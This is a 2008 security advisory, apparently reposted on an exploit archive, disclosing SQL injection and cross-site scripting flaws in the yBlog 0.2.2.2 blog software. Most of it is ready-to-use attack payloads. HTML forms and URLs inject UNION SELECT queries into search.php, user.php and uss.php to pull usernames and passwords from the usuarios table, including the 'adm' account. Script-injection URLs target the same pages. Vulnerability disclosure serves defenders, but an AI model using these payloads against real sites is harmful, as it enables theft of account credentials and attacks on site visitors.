yBlog 0.2.2.2 Multiple Remote Vulnerabilities

2008.06.13
Risk: High
Local: No
Remote: Yes
CWE: CWE-79
CWE-89

_____ _ _ _____ _____ _____ _____ / ___| |_| | _ \| _ | _ |_ _| | (___| _ | [_)_/| (_) | (_) | | | \_____|_| |_|_| |_||_____|_____| |_| C. H. R. O. O. T. SECURITY GROUP - -- ----- --- -- -- ---- --- -- - http://www.chroot.org _ _ _ _____ ____ ____ __ _ Hacks In Taiwan | |_| | |_ _| __| | \| | Conference 2008 | _ | | | | | (__| () | | |_| |_|_| |_| \____|____|_|\__| http://www.hitcon.org Title =======:: yBlog 0.2.2.2 Multiple Remote Vulnerabilities Author ======:: unohope [at] chroot [dot] org IRC =========:: irc.chroot.org #chroot ScriptName ==:: yBlog Download ====:: http://nchc.dl.sourceforge.net/sourceforge/y-blog/yblog-0.2.2.2.tar.gz Mirror ======:: http://www.badongo.com/file/9705849 ______________________ [SQL Injection] - {search.php} - <form action="http://localhost/yblog/search.php" method="post"> <input type="hidden" name="q" value="' union select 0,1,2,3,usuario,5,6,7,8,9,10,password,12,13,14,15,16 from usuarios/*"> <input type="submit" value="send"> </form> <form action="http://localhost/yblog/search.php" method="post"> <input type="hidden" name="cn" value="1"> <input type="hidden" name="q" value="' union select 0,1,2,3,usuario,5,6,7,8,9,10,password,12,13,14,15,16 from usuarios/*"> <input type="submit" value="send"> </form> - {user.php} - http://localhost/yblog/user.php?n=-99'+union+select+0,1,2,3,usuario,pass word,6,7,8,9,10,11,12,13,14,15,16+from+usuarios/* - {uss.php} - http://localhost/yblog/uss.php?action=2&done=1&n=-99'+union+select+0,1,2 ,usuario,password,5,6,7,8,9,10,11,12,13,14,15,16+from+usuarios+where+usu ario='adm'/* ______________________ [Cross-Site Scripting] - {search.php} - <form action="http://localhost/yblog/search.php" method="post"> <input type="hidden" name="q" value="<script>alert(/xss/)</script>"> <input type="submit" value="send"> </form> - {user.php} - http://localhost/yblog/user.php?n=<script>alert(/xss/)</script> - {uss.php} - http://localhost/yblog/uss.php?action=2&done=1&n=<script>alert(/xss/)</s cript> ______ [NOTE] !! This is just for educational purposes, DO NOT use for illegal. !!

Referencje:

http://xforce.iss.net/xforce/xfdb/42958
http://www.securityfocus.com/bid/29629
http://www.securityfocus.com/archive/1/archive/1/493222/100/0/threaded
http://www.milw0rm.com/exploits/5773
http://chroot.org/exploits/chroot_uu_009


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top